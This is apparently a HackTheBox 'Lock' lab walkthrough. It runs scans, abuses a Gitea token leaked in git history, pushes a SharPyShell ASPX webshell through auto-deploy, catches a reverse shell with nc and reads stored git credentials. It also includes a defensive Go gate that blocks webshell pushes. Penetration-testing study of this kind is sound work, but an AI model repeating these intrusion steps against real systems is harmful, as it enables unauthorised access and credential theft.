┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# nmap 10.129.234.64
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-28 10:34 EDT
Nmap scan report for LOCK.Lock (10.129.234.64)
Host is up (0.12s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
3000/tcp open ppp
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# nmap 10.129.234.64 -p 80,445,3000,3389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-28 10:35 EDT
Nmap scan report for LOCK.Lock (10.129.234.64)
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Lock - Index
445/tcp open microsoft-ds?
3000/tcp open http Golang net/http server
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=f7a8ff3baaefe524; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=U-dK9KwuiqnoaaKyBACgiCHPvOI6MTc2MTY2MjE2Mzc3NTg0MDMwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 28 Oct 2025 14:36:04 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjU
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=eb9093768792892b; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=SzX5CPkIwxPfaDgbqkUJgYCXnjg6MTc2MTY2MjE2NzE1NTE3NjcwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 28 Oct 2025 14:36:07 GMT
|_ Content-Length: 0
|_http-title: Gitea: Git with a cup of tea
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: LOCK
| NetBIOS_Domain_Name: LOCK
| NetBIOS_Computer_Name: LOCK
| DNS_Domain_Name: Lock
| DNS_Computer_Name: Lock
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-28T14:36:31+00:00
|_ssl-date: 2025-10-28T14:37:11+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=Lock
| Not valid before: 2025-10-27T14:06:07
|_Not valid after: 2026-04-28T14:06:07
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=10/28%Time=6900D4D3%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nCache-Control
SF::\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCont
SF:ent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_gitea
SF:=f7a8ff3baaefe524;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cooki
SF:e:\x20_csrf=U-dK9KwuiqnoaaKyBACgiCHPvOI6MTc2MTY2MjE2Mzc3NTg0MDMwMA;\x20
SF:Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Optio
SF:ns:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2028\x20Oct\x202025\x2014:36:04\x20
SF:GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme
SF:-auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=devic
SF:e-width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x20
SF:cup\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:ap
SF:plication/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlY
SF:SIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRf
SF:dXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8
SF:vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbm
SF:ciLCJzaXplcyI6IjU")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCo
SF:ntent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n
SF:\r\n400\x20Bad\x20Request")%r(HTTPOptions,1A4,"HTTP/1\.0\x20405\x20Meth
SF:od\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x20G
SF:ET\r\nCache-Control:\x20max-age=0,\x20private,\x20must-revalidate,\x20n
SF:o-transform\r\nSet-Cookie:\x20i_like_gitea=eb9093768792892b;\x20Path=/;
SF:\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:\x20_csrf=SzX5CPkIwxPfaDgbq
SF:kUJgYCXnjg6MTc2MTY2MjE2NzE1NTE3NjcwMA;\x20Path=/;\x20Max-Age=86400;\x20
SF:HttpOnly;\x20SameSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x2
SF:0Tue,\x2028\x20Oct\x202025\x2014:36:07\x20GMT\r\nContent-Length:\x200\r
SF:\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConten
SF:t-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n
SF:400\x20Bad\x20Request");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-28T14:36:32
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.02 seconds
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# dirsearch -u http://10.129.234.64 -x 403 ,404
/root/.local/share/uv/tools/dirsearch/lib/python3.12/site-packages/dirsearch/lib/core/installation.py:24: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12293
Target: http://10.129.234.64/
[10:55:00] Scanning:
[10:55:05] 404 - 2KB - /.asmx
[10:55:05] 404 - 2KB - /.ashx
[10:55:09] 500 - 1KB - /.git
[10:55:09] 500 - 1KB - /.git/
[10:55:09] 301 - 159B - /.git/logs/refs -> http://10.129.234.64/.git/logs/refs/
[10:55:09] 301 - 165B - /.git/logs/refs/heads -> http://10.129.234.64/.git/logs/refs/heads/
[10:55:09] 301 - 174B - /.git/logs/refs/remotes/origin -> http://10.129.234.64/.git/logs/refs/remotes/origin/
[10:55:09] 301 - 167B - /.git/logs/refs/remotes -> http://10.129.234.64/.git/logs/refs/remotes/
[10:55:09] 301 - 160B - /.git/refs/heads -> http://10.129.234.64/.git/refs/heads/
[10:55:09] 301 - 162B - /.git/refs/remotes -> http://10.129.234.64/.git/refs/remotes/
[10:55:09] 301 - 169B - /.git/refs/remotes/origin -> http://10.129.234.64/.git/refs/remotes/origin/
[10:55:09] 301 - 159B - /.git/refs/tags -> http://10.129.234.64/.git/refs/tags/
[10:55:30] 404 - 2KB - /admin%20/
[10:55:31] 404 - 2KB - /admin.
[10:55:49] 301 - 158B - /aspnet_client -> http://10.129.234.64/aspnet_client/
[10:55:49] 301 - 151B - /assets -> http://10.129.234.64/assets/
[10:55:49] 404 - 2KB - /asset..
[10:55:57] 200 - 46B - /CHANGELOG.txt
[10:55:57] 200 - 46B - /CHANGELOG.TXT
[10:55:57] 200 - 46B - /ChangeLog.txt
[10:55:58] 200 - 46B - /Changelog.txt
[10:55:58] 200 - 46B - /changelog.txt
[10:56:09] 400 - 3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[10:56:20] 404 - 2KB - /index.php.
[10:56:20] 200 - 16KB - /index.html
[10:56:22] 404 - 2KB - /javax.faces.resource.../
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[10:56:22] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[10:56:22] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[10:56:22] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[10:56:22] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[10:56:22] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[10:56:22] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[10:56:26] 404 - 2KB - /login.wdm%2e
[10:56:45] 404 - 2KB - /rating_over.
[10:56:49] 404 - 2KB - /service.asmx
[10:56:55] 404 - 2KB - /static..
[10:57:00] 404 - 2KB - /umbraco/webservices/codeEditorSave.asmx
[10:57:04] 404 - 2KB - /WEB-INF./
[10:57:06] 404 - 2KB - /WebResource.axd?d=LER8t9aS
Task Completed
Nothing useful. A .git directory is found, but it cannot be accessed.
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# curl http://10.129.234.64//changelog.txt
# Changelog
- Added first website version
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# dirsearch -u http://10.129.234.64:3000/ -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/lock/reports/http_10.129.234.64_3000/__25-10-28_11-02-07.txt
Target: http://10.129.234.64:3000/
[11:02:07] Starting:
[11:02:21] 200 - 1KB - /.well-known/openid-configuration
[11:02:21] 200 - 206B - /.well-known/security.txt
[11:02:29] 303 - 38B - /admin -> /user/login
[11:02:30] 303 - 38B - /admin/ -> /user/login
[11:02:39] 200 - 16KB - /administrator
[11:02:39] 200 - 16KB - /administrator/
>>>> [11:02:43] 200 - 704B - /api/swagger
[11:03:00] 303 - 41B - /explore -> /explore/repos
[11:03:00] 200 - 15KB - /explore/repos
[11:03:01] 301 - 58B - /favicon.ico -> /assets/img/favicon.png
[11:03:07] 303 - 38B - /issues -> /user/login
[11:03:31] 200 - 279B - /sitemap.xml
[11:03:39] 200 - 10KB - /user/login/
[11:03:40] 401 - 50B - /v2
[11:03:40] 401 - 50B - /v2/
[11:03:40] 401 - 50B - /v2/_catalog
Task Completed
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# curl http://10.129.234.64:3000//.well-known/openid-configuration
{
"issuer": "http://localhost:3000/",
"authorization_endpoint": "http://localhost:3000/login/oauth/authorize",
"token_endpoint": "http://localhost:3000/login/oauth/access_token",
"jwks_uri": "http://localhost:3000/login/oauth/keys",
"userinfo_endpoint": "http://localhost:3000/login/oauth/userinfo",
"introspection_endpoint": "http://localhost:3000/login/oauth/introspect",
"response_types_supported": [
"code",
"id_token"
],
"id_token_signing_alg_values_supported": [
"RS256"
],
"subject_types_supported": [
"public"
],
"scopes_supported": [
"openid",
"profile",
"email",
"groups"
],
"claims_supported": [
"aud",
"exp",
"iat",
"iss",
"sub",
"name",
"preferred_username",
"profile",
"picture",
"website",
"locale",
"updated_at",
"email",
"email_verified",
"groups"
],
"code_challenge_methods_supported": [
"plain",
"S256"
],
"grant_types_supported": [
"authorization_code",
"refresh_token"
]
}
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# curl http://10.129.234.64:3000//.well-known/security.txt
# This site is running a Gitea instance.
# Gitea related security problems could be reported to Gitea community.
# Site related security problems should be reported to this site's admin.
Contact: https://github.com/go-gitea/gitea/blob/main/SECURITY.md
Policy: https://github.com/go-gitea/gitea/blob/main/SECURITY.md
Preferred-Languages: en
Swagger exposure.
Test it with swagger-hack.
Tried appending the usual paths, but there is no swagger.json document, so the script cannot be run automatically. A few endpoints were tested by hand and all returned 401; authentication is indeed required.
There is a Python script:
import requests
import sys
import os


def format_domain(domain):
    # Default to HTTPS when the caller passes a bare host name.
    if not domain.startswith(('http://', 'https://')):
        domain = 'https://' + domain
    return domain


def get_repositories(token, domain):
    # Gitea personal access tokens are sent as "Authorization: token <value>".
    headers = {
        'Authorization': f'token {token}'
    }
    url = f'{domain}/api/v1/user/repos'
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        return response.json()
    else:
        raise Exception(f'Failed to retrieve repositories: {response.status_code}')


def main():
    if len(sys.argv) < 2:
        print("Usage: python script.py <gitea_domain>")
        sys.exit(1)
    gitea_domain = format_domain(sys.argv[1])
    # The token is read from the environment instead of the command line.
    personal_access_token = os.getenv('GITEA_ACCESS_TOKEN')
    if not personal_access_token:
        print("Error: GITEA_ACCESS_TOKEN environment variable not set.")
        sys.exit(1)
    try:
        repos = get_repositories(personal_access_token, gitea_domain)
        print("Repositories:")
        for repo in repos:
            print(f"- {repo['full_name']}")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    main()
It is just a script that lists the repositories of the token's user; it needs an access token as input.
Besides the script, we also learn that the repository owner is ellen.freeman.
The repository's git history also has commits,
and a token is in them.
Let's try running the script with that token:
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# export GITEA_ACCESS_TOKEN=43ce39bb0bd6bc489284f2905f033ca467a6362f
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# python repos.py http://10.129.234.64:3000
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website
There is another repository: ellen.freeman/website.
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# curl -H "Authorization: token 43ce39bb0bd6bc489284f2905f033ca467a6362f" \
http://10.129.234.64:3000/api/v1/user/repos |jq .
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4140 0 4140 0 0 14063 0 --:--:-- --:--:-- --:--:-- 14081
[
{
"id": 1,
"owner": {
"id": 2,
"login": "ellen.freeman",
"login_name": "",
"full_name": "",
"email": "ellen.freeman@lock.vl",
"avatar_url": "http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74",
"language": "",
"is_admin": false,
"last_login": "0001-01-01T00:00:00Z",
"created": "2023-12-27T11:13:10-08:00",
"restricted": false,
"active": false,
"prohibit_login": false,
"location": "",
"website": "",
"description": "",
"visibility": "public",
"followers_count": 0,
"following_count": 0,
"starred_repos_count": 0,
"username": "ellen.freeman"
},
"name": "dev-scripts",
"full_name": "ellen.freeman/dev-scripts",
"description": "",
"empty": false,
"private": false,
"fork": false,
"template": false,
"parent": null,
"mirror": false,
"size": 29,
"language": "Python",
"languages_url": "http://localhost:3000/api/v1/repos/ellen.freeman/dev-scripts/languages",
"html_url": "http://localhost:3000/ellen.freeman/dev-scripts",
"url": "http://localhost:3000/api/v1/repos/ellen.freeman/dev-scripts",
"link": "",
"ssh_url": "ellen.freeman@localhost:ellen.freeman/dev-scripts.git",
"clone_url": "http://localhost:3000/ellen.freeman/dev-scripts.git",
"original_url": "",
"website": "",
"stars_count": 0,
"forks_count": 0,
"watchers_count": 1,
"open_issues_count": 0,
"open_pr_counter": 0,
"release_counter": 0,
"default_branch": "main",
"archived": false,
"created_at": "2023-12-27T11:17:47-08:00",
"updated_at": "2023-12-27T11:36:42-08:00",
"archived_at": "1969-12-31T16:00:00-08:00",
"permissions": {
"admin": true,
"push": true,
"pull": true
},
"has_issues": true,
"internal_tracker": {
"enable_time_tracker": true,
"allow_only_contributors_to_track_time": true,
"enable_issue_dependencies": true
},
"has_wiki": true,
"has_pull_requests": true,
"has_projects": true,
"has_releases": true,
"has_packages": true,
"has_actions": false,
"ignore_whitespace_conflicts": false,
"allow_merge_commits": true,
"allow_rebase": true,
"allow_rebase_explicit": true,
"allow_squash_merge": true,
"allow_rebase_update": true,
"default_delete_branch_after_merge": false,
"default_merge_style": "merge",
"default_allow_maintainer_edit": false,
"avatar_url": "",
"internal": false,
"mirror_interval": "",
"mirror_updated": "0001-01-01T00:00:00Z",
"repo_transfer": null
},
{
"id": 5,
"owner": {
"id": 2,
"login": "ellen.freeman",
"login_name": "",
"full_name": "",
"email": "ellen.freeman@lock.vl",
"avatar_url": "http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74",
"language": "",
"is_admin": false,
"last_login": "0001-01-01T00:00:00Z",
"created": "2023-12-27T11:13:10-08:00",
"restricted": false,
"active": false,
"prohibit_login": false,
"location": "",
"website": "",
"description": "",
"visibility": "public",
"followers_count": 0,
"following_count": 0,
"starred_repos_count": 0,
"username": "ellen.freeman"
},
"name": "website",
"full_name": "ellen.freeman/website",
"description": "",
"empty": false,
"private": true,
"fork": false,
"template": false,
"parent": null,
"mirror": false,
"size": 7370,
"language": "CSS",
"languages_url": "http://localhost:3000/api/v1/repos/ellen.freeman/website/languages",
"html_url": "http://localhost:3000/ellen.freeman/website",
"url": "http://localhost:3000/api/v1/repos/ellen.freeman/website",
"link": "",
"ssh_url": "ellen.freeman@localhost:ellen.freeman/website.git",
"clone_url": "http://localhost:3000/ellen.freeman/website.git",
"original_url": "",
"website": "",
"stars_count": 0,
"forks_count": 0,
"watchers_count": 1,
"open_issues_count": 0,
"open_pr_counter": 0,
"release_counter": 0,
"default_branch": "main",
"archived": false,
"created_at": "2023-12-27T12:04:52-08:00",
"updated_at": "2024-01-18T10:17:46-08:00",
"archived_at": "1969-12-31T16:00:00-08:00",
"permissions": {
"admin": true,
"push": true,
"pull": true
},
"has_issues": true,
"internal_tracker": {
"enable_time_tracker": true,
"allow_only_contributors_to_track_time": true,
"enable_issue_dependencies": true
},
"has_wiki": true,
"has_pull_requests": true,
"has_projects": true,
"has_releases": true,
"has_packages": true,
"has_actions": false,
"ignore_whitespace_conflicts": false,
"allow_merge_commits": true,
"allow_rebase": true,
"allow_rebase_explicit": true,
"allow_squash_merge": true,
"allow_rebase_update": true,
"default_delete_branch_after_merge": false,
"default_merge_style": "merge",
"default_allow_maintainer_edit": false,
"avatar_url": "",
"internal": false,
"mirror_interval": "",
"mirror_updated": "0001-01-01T00:00:00Z",
"repo_transfer": null
}
]
We can clone that repository directly with the token:
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# git clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.129.234.64:3000/ellen.freeman/website.git
Cloning into 'website'...
remote: Enumerating objects: 165, done.
remote: Counting objects: 100% (165/165), done.
remote: Compressing objects: 100% (128/128), done.
remote: Total 165 (delta 35), reused 153 (delta 31), pack-reused 0
Receiving objects: 100% (165/165), 7.16 MiB | 99.00 KiB/s, done.
Resolving deltas: 100% (35/35), done.
README.md contains a hint:
# New Project Website
CI/CD integration is now active - changes to the repository will automatically be deployed to the webserver
Combined with the Windows IIS website, uploading an ASPX webshell through the repository is an option here.
webshell/aspx/asp.net-backdoors/filesystembrowser.aspx at master · tennc/webshell · GitHub
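From the defender's side, the property that makes this work is that anything pushed to the repository is deployed to IIS without review. As an added example (not from this page, not Gitea's code, and not the CI/CD setup on the box), here is the kind of gate a pre-receive hook or CI job could run over the output of `git diff --name-status old..new`: it refuses to deploy files with server-side executable extensions and files whose content carries ASP.NET server-code markers even under a harmless extension. The sample push and the file contents are constructed; the file name sharpyshell.aspx is taken from the push shown on this page, its content here is a placeholder.

```go
package main

import (
	"fmt"
	"path"
	"regexp"
	"sort"
	"strings"
)

// Constructed sample of `git diff --name-status old..new`, the view a
// pre-receive hook or CI job gets of a push like the one on this page.
const SamplePush = "M\tindex.html\nA\tsharpyshell.aspx\nA\tdocs/help.html\nA\tassets/img/logo.png\nD\tCHANGELOG.txt\n"

// Constructed file contents the hook would fetch with `git show new:path`.
var SampleContents = map[string]string{
	"index.html":          "<!DOCTYPE html><html><body>Lock</body></html>",
	"sharpyshell.aspx":    "<%@ Page Language=\"C#\" %>\n<!-- placeholder body -->",
	"docs/help.html":      "<html><script runat=\"server\">void Page_Load(object s, EventArgs e) {}</script></html>",
	"assets/img/logo.png": "\x89PNG\r\n\x1a\n",
}

// Extensions IIS hands to a script engine or loads as code; none belong in a
// static site that is auto-deployed straight from a repository.
var blockedExt = map[string]bool{
	".asp": true, ".aspx": true, ".ashx": true, ".asmx": true, ".cshtml": true,
	".config": true, ".dll": true, ".exe": true, ".ps1": true,
}

// Markers of ASP.NET server code, checked regardless of extension.
var serverCode = regexp.MustCompile(`(?i)<%@\s*(page|webhandler|control|application)\b|runat\s*=\s*"server"`)

type Finding struct {
	Path   string
	Reason string
}

// ReviewPush returns every added, modified or renamed file that would turn
// the auto-deploy into code execution on the web server. Deleted files are
// skipped; a file whose content cannot be fetched is flagged, not trusted.
func ReviewPush(nameStatus string, contents map[string]string) []Finding {
	var findings []Finding
	for _, line := range strings.Split(nameStatus, "\n") {
		fields := strings.Split(line, "\t")
		if len(fields) < 2 {
			continue
		}
		status, p := fields[0], fields[len(fields)-1] // renames list the new path last
		if status == "D" {
			continue
		}
		if blockedExt[strings.ToLower(path.Ext(p))] {
			findings = append(findings, Finding{p, "server-side executable extension"})
			continue
		}
		body, ok := contents[p]
		if !ok {
			findings = append(findings, Finding{p, "content unavailable for inspection"})
			continue
		}
		if serverCode.MatchString(body) {
			findings = append(findings, Finding{p, "ASP.NET server code markers in content"})
		}
	}
	sort.Slice(findings, func(i, j int) bool { return findings[i].Path < findings[j].Path })
	return findings
}

func main() {
	findings := ReviewPush(SamplePush, SampleContents)
	for _, f := range findings {
		fmt.Printf("DENY %s: %s\n", f.Path, f.Reason)
	}
	if len(findings) == 0 {
		fmt.Println("push is safe to deploy")
	}
}
```

On the sample push the gate denies sharpyshell.aspx on its extension and docs/help.html on its `runat="server"` content, while the HTML and image changes pass. Run from a hook, a non-empty result should fail the push (or the deploy job) rather than just log it; the extension list and marker pattern are a starting point to tune for the site.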
┌──(root㉿kali)-[~/Desktop/htb/lock/SharPyShell]
└─# python SharPyShell.py generate -p 123
____ _ _ ____ ____ _ _ _
/ ___| _| || |_ __ _ _ __| _ \ _ _/ ___|| |__ ___| | |
\___ \|_ .. _|/ _` | '__| |_) | | | \___ \| '_ \ / _ \ | |
___) |_ _| (_| | | | __/| |_| |___) | | | | __/ | |
|____/ |_||_| \__,_|_| |_| \__, |____/|_| |_|\___|_|_|
|___/
#SharPyShell v1.3 - @splinter_code
SharPyShell webshell written correctly to: /root/Desktop/htb/lock/SharPyShell/output/sharpyshell.aspx
Upload it to the target server and let's start having some fun :)
When committing, git asks you to set a user name and email:
2025-10-29 10:33:17.625 [info] > git -c user.useConfigOnly=true commit --quiet [3ms]
2025-10-29 10:33:17.625 [info] Author identity unknown
*** Please tell me who you are.
Run
git config --global user.email "you@example.com"
git config --global user.name "Your Name"
to set your account's default identity.
Omit --global to set the identity only in this repository.
fatal: no email was given and auto-detection is disabled
Just configure them:
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git config --global user.email you@example.com
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git config --global user.name Name
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git push
Everything up-to-date
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git status
On branch main
Your branch is up to date with 'origin/main'.
Changes to be committed:
(use "git restore --staged <file>..." to unstage)
new file: webshell.aspx
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git add .
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git commit -m shell
[main a382e9a] shell
1 file changed, 21 insertions(+)
create mode 100644 sharpyshell.aspx
┌──(root㉿kali)-[~/Desktop/htb/lock/website]
└─# git push
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 8 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 4.95 KiB | 4.95 MiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.129.234.64:3000/ellen.freeman/website.git
73cdcc1..a382e9a main -> main
First, get a reverse shell back:
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.67] from (UNKNOWN) [10.129.234.64] 57861
PS C:\windows\system32\inetsrv> whoami
lock\ellen.freeman
PS C:\windows\system32\inetsrv> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::6896:bf9e:e5c5:fb3f
Link-local IPv6 Address . . . . . : fe80::1f84:988f:20cf:a6d8%7
IPv4 Address. . . . . . . . . . . : 10.129.234.64
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%7
10.129.0.1
Credentials are found in ellen.freeman's home directory:
PS C:\users\ellen.freeman> type .git-credentials
http://ellen.freeman:YWFrWJk9uButLeqx@localhost:3000
Verify them:
┌──(root㉿kali)-[~/Desktop/htb/lock]
└─# nxc rdp 10.129.234.64 -u ellen.freeman -p YWFrWJk9uButLeqx
RDP 10.129.234.64 3389 LOCK [*] Windows 10 or Windows Server 2016 Build 20348 (name:LOCK) (domain:Lock) (nla:False)
RDP 10.129.234.64 3389 LOCK [-] Lock\ellen.freeman:YWFrWJk9uButLeqx (STATUS_LOGON_FAILURE)
Let's see what else we can read:
PS C:\users> tree /a /f
Folder PATH listing
Volume serial number is 8592-A9D9
C:.
+---.NET v4.5
+---.NET v4.5 Classic
+---Administrator
+---ellen.freeman
| | .git-credentials
| | .gitconfig
| |
| +---.ssh
| | authorized_keys
| |
| +---3D Objects
| +---Contacts
| +---Desktop
| +---Documents
| | config.xml
| |
| +---Downloads
| +---Favorites
| | | Bing.url
| | |
| | \---Links
| +---Links
| | Desktop.lnk
| | Downloads.lnk
| |
| +---Music
| +---Pictures
| +---Saved Games
| +---Searches
| \---Videos
+---gale.dekarios
\---Public
+---Documents
+---Downloads
+---Music
+---Pictures
\---Videos
PS C:\users\ellen.freeman\documents> type config.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp" ConfVersion="2.6">
